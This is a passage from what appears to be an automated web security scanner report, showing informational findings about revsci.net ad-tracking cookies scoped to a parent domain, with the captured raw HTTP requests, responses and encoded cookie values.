YmV2h+wwJr2U932jw7uckzIu2KhfleXStVf5szjBOLOa+y6DYbO3l752CDjqcNGgt98WXWQS/teXsUNhDIaMd0i09mBW/cxrxv3Wg8T154jTDHbimdT7m0+QA7ZqMahAyOY5Qh+xMyEL8u01a08WVEZzU3AqKsw8C142Y1c299TJeEWPuMgZ5YTXTP1G276cFI7/o4HXMNbodyq24gF8lkm94Yem6Mj665eKj6RoAIbYCzWRo0CyuiXo7+d79byEIWuXTn8KeYIZrcovpN7fFUFqRVjr62RSSNy7g7RZdcsRvatce3Am46NZ79It3XObxwQ+3jY+/9U2FyiPGAJKE4yLKBlexK5bWQClscsAAoeAPV0f73zDCy5pYbliKm6nxWJYphUXiWXFi4ULvsFdT0/cQ3cZZmstY5fA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:08:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E06560/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%3A%2F%2Fwww.telegraph.co.uk%2F%253FRetargeting_Value%253DTelegraphUS_CrUnTag HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsiPus_X4PT="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/kuahp71BIcXCRw70aR2FbQZphz9qM0BoSXNrnSUtb1vwmbJzUt+6liEIkN8nrWWX49PmkZWW1AQyxTat59DoRy7H510PzwzMCk8K7PkuBlggz7RRjnYHQk9yPFNSPuFYXD8+of9pW1gadqZsPy/lCP1mb/hB/5tab3fYk/S9QZde8Ke7UP4ikGZj04cgy9BdGB4HvVZsX2bc1yza6KvITnWWE0HZ+7cN8Jg1NCiwz8jl32gMXb6N/qI4VuOKXe3FZo24PpviVIPNr/ssKopzQ22+/8RAsNVCe6i5Wf7DFjwcgNPCHpLt4mAAfXOeHuEdpCzKR8WFlj1xgVgZUU+INSvS2z6te5yoeNUw4HRiUrYCKxH73Eg6MA7Er36fSX5enLNSdiTZ1KP5bLMuXSGVdFE6t1EYHrYwDofZ4Gi5DZXZxPgW+sJoRtfvcDqKsgC9l+IsJB7nNduwyA3I1YTpITizOmgtt5MrPfVmPJdn7gKUf+jHWbBJ5GMLjEME3bXGAdEZRxgn2OCBUl+atoejo4T2cDgLXZC69WmDUxvRetZUISrW53APFNqsXT76F3wLTA7rse1TepIQ3K5Sr9Dz24nTjbgFmWDBZawbGpcVus1bCBG7jJ2QHy71TvrwBwjQnv/tmyup8hmB9BqVRtTgK4O6IFG99CpVYeRoLgpYotP2qbzIW2rKhml7nZh14t4sjTGGCNJbIJzypI8nENGPQ6yRPH5it9BZvmUu1r8mBYVTM/xg/zf8Yv+Na+2v4H9K1yamEkfjZiqon9otsk4n4jc1hB4qu7q/fYhEV2hIj5XXi7GJ28bmT+GLIwPMItkEKGQU48qq1SxMeq98BqICBam8UD01Awv5x02auQlEjMMskib5v2siqNZQGnKAjyF0RA4bzFQrmJLVb8f3sCgDULdPpklc4Wu4ByeEMyDeboQjr7oIU/lnJmPFhTfO+4g84CiB0cuCF0h6DlFjDyreTCppkxsHoBbRca0d/Md49KTI025El8ssgsHXfa+d8wp3Pai72i6aSBzqjUtcgTjzlp+L839gXv12f3OdbmZjw5puQDg8IF5dFJxhJCyX4wuOINPJuFk+MYvGpWy+BM5zYVAgnYZROsMFxNAxbLsdowJ8wLiFlce7Pzc6DlB2NoAbzsgQUFc7mjOiQLSd6fj8EuyhEsCvF4+XSllVtkU/mIjhmGg6WKAwY9UaugjDrXuwns1iAx7xSW50kkCNX+Z48cNoKLLTFVxyG5Pa3nmUCAgMLJ8pjOpE12Gzi9zbmV+prWKPMYNG1IAMWdZaZJdenltGUDJmTreWyrSHOc8Ss"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZCz2jywJqL21DklO4FpqrW4mts2r3+iyqdBm+PLbybIfPRXAGyAWqGaUcN76Ja1qAOTDE6FHSoqvcSTZGmsjHtyxiXTlK6880FLG12A2PlULpyvcZq9IqvpxPKk0YhA04L1Nso5MmhH0E/wCH/Y1ZbonZH/Q/zyE8fVAttnFQDh4QDENSCazWB7wm3+nvmKOwFtWi3KgcXOk7dGFHTPtbI66KrO68kGZE+JkCfFVU7Wqivfeaa/8/Ww7TBQ+iOcjF+lqvdirOi3uZTKpcnbwP0nJnsijbA/cJS8z7XZpW5E27Q8oHruI+D7xiQrYDXrgYCt7vxjlWiD0C7R3piUSf/X68aLEy3FTmG/xOMAoB69ZpMVfVMOaN8xjaZmZFCuwIv05D/jAgdQfdSrSmgeY3750+Elemimcf/YgmUWbQpxY7id5ZJJ/FFJQsHUDwMmERm6coNPtUyGm08BdzFgPwI9sbosRdU4r9N9j4TnpUeokHF6xcBZRYaZkG8qTxG8I12emFJrmxBR4NJ+W5TBRQe9U9DTLImPJYPfR3BLLiZYLilbS32aQRVgM8hJbchNHF6yxAQDjqs5OAeW4vOXuvZwdsE/K0lW9oBAqJFUcvLnRUwoQ2/ML+NNsg6RISCSZKfgaFhonxnPCMNGtDpEq7GNli8jPrAZpLu9+9GnQ+hIX7yDJyTyNBdW9hYD78/mMXUcU0HkaTIs97gbz9eg6hyf3N94xERrzR3hZyQkDwdrDAWoVu3JcVZyqjA5Zhbyyxuw/Y9SzAwKuqU19w6EJGhSq8Pu1tgCRPhNO5FjqkCWCJ98OL5THufKBvYnngdSuYaipEf4pMXCZ3OOlSxYrP5FpDjeneIOCGt7in7P8m0dCTolKOUZ0Mc9bxREjWOPJCjTwZj090ZkwYL3v7SvSv5Hon88wynPgObfg6+sER2sFWLhHDfP2e99VhGrbSIRfNiEsbBEHHHmxxaDa6WKZOLPUFzDUy29I12O54XpGU6gKaAV4YZ/sppgmz5E8F6pVBfe166LxmHw6AwbOqagxZNAf6IRrmdtyS5tC4RD/jw4JSD3ddVqC1sR2BJLzWZmzcbk3mUs4/A261dO2RDS/8af3Ia6pcILnfVsN1XR1RWKZHVOLUu7dxhypMOKdV7TAWMbtxK6TwEPNT4UVMOgMps2kKKazsKGdmJPVsNbziG5AQCdWcKvR685TAqy1capdei3AOkD55LYQ/qwiWwHzbplal55Tk5WTpo9RFgh2aJ2NZP6vmM3mJ7JYW5txoE6vdwdARHIqwcHrn5ZUEvCUgqY4NLPWV/9rNyqFar6I/aqh56ic5y+C7VLauAtS/xPO0/it6HQW2BKNu07L2qr0vgLooN3ZwsdDhJt0gbz0PzywZzDhtIx6bu4RRQTi/Q6rWVRapJcvuixV+Z6RmY+G0tOarFkBLC25o7k6G9Ey3ohXcKDMtUfky6FGfBdTi7PaDVFUHGLWRTn/AmwGe+NW5ymLXUh0/OSxD9ToW35VGT3kb58lKhqt8k/d4hqeTtUo1lmLzm4vntzE1N8mNzD7FuICvy5VJclYbydw1TC9cDxtcH70JZPCxubJDJt+BiSkqoEhJfPre0sbS9ImjLKXlW7Rf6AF4l05YBcSS88ZdgC8D6DXjVl73lOD7oOLmdpbV8hYDrdrM0zWvbG+6Esd/bXEZVN3QqDbihQq3NMq12tk+nHOm4Z4O6wqYFGZ/PHWfMapZf5Tql4iE="; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z4eoyMpqLKxALV17HF2gQ4O3XYcv0liDtqNncA2iFgL2IcBvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1xGXKzaXaBtH5FPnD6taOU3kVssC9SmHYB9KeGG/XzENTJKFQaxKUNkLwv0xvwv6ry+VgYngIEBxgFkFF2aLcNH2JA8tdDcEJabBXk6s7CW81/sxD23OYhiURv44ZG2Vyw7fWwDac3umENIVkfupsNmF7BNwRypgZ1iUkGK8ES3J/9sW0+NMYS0Nx4rCbHauGZpBbtBekNAISVW7BkfpZu8IaAfV6v9iL2W3Sah5YI4MmJmv8BbaGzbcKsAHjUWBJoPRIeiZxKlcny+UjolHuiKiwq3e6odvBck1n0en9Re93HGG7k9KFAoHUG20cBItFTdD2+YNuStdlMqCFsNUKNR05Ch0q3u8Hh9t+wXkjsCkhzxj44JhDpp6qF320JTJ2Gc5UCAVHUWPAI1koc/TaDfYnhCnjT+kKvKZlBxANciLTabps7hCaz4APVhvxQTYiS7mPVfaPTjbdi4nni6PPrRkLDSscL67fQ7sBBmSo4oht+j/ohCo+Q7JLtE53SW6lvXjLf1ewgf+fSsq4cpW+8+6kpGjb9QVbOdnXG4DCuaHFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_622X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AhSj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8pDG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HHwW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YxMN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPTrTFTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0wwnt14JwP+YcsIwSmkFOWlzUMTmbjeI5py/GeW6vTjQ8ktlzVfsKdjSdKUW1ejPcGkrIUMmJ/oBB7d/OAfDEuJfnOUCNWLPIM7caSHwIGF5AYAZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7TB2NMhNPN79A2huyqlNthUg8L/sfzZK6uEPDs3kNnwyTO8oxSKaRZV8TluurTIekROhiO5vzTgpOdHTZm6U+pH9eWOHzNASrq2YbE5q9TTg2L+V4kxdvVOakbMEg7mrhpBBm5sRyOtyMwDjf2i8M4DIGPTsTRKDtUa9gunknbf/xK7rf/UGHTSt2Hv1K41b7f/pMiKLo478io+Vk+rdp+BX7nMiTGgJC8qmDUhyyKMVH2Yt46IUv2zHxvuidsn1oGg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:08:41 GMT; Path=/
Set-Cookie: rtc_k8zl=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; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:08:41 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 16 Jun 2011 13:08:40 GMT

GIF89a.............!.......,...........D..;

10.120. http://pix04.revsci.net/G07608/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9fxKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C5RAiiAQYMQkaugeRM6rM/rSpP7RG7CFImDEIo+ZBxqIBIeZ+v3cM8F6iRLQzaH1DXQZr18dGmrbf+V7QUoiZ0gWnenJxJJMyQWZ0z/uI+KrnzxNnfHDxF+JCvmJDRN+8iExCSVxXVcEuEzVns7DeeHbBmOE8SRm++crK0omvqP/CfGX/DbBUxp1a3nt6JIJOhMBXHohM3DmzPoKuWuptd0Ma4U3S/mvJMjNaGZ+h2R3rHVICpO0sF6nd/LPqsbK3vOkk8FWqANAReKveX6vv424aoESBdu1mR6KA7WmNW+Zwj+rJJvKXOPsWdBzMbj02qJxZnLSwD3C5ODnISsuK0Rw1af7v3s2u6sHlE3HiAdJp/GqcuQhOyTW3qYudZXum8EjHSamUCkFqdy9wcuvk6ZamKiglqUheua638AObL0rMRx+eowSq/lw9vb3yh++2J+axlFbzsjJbwrS90p1UmzQuU47NxiHAg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G07608/a4/0/0/pcx.js?csid=G07608 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; 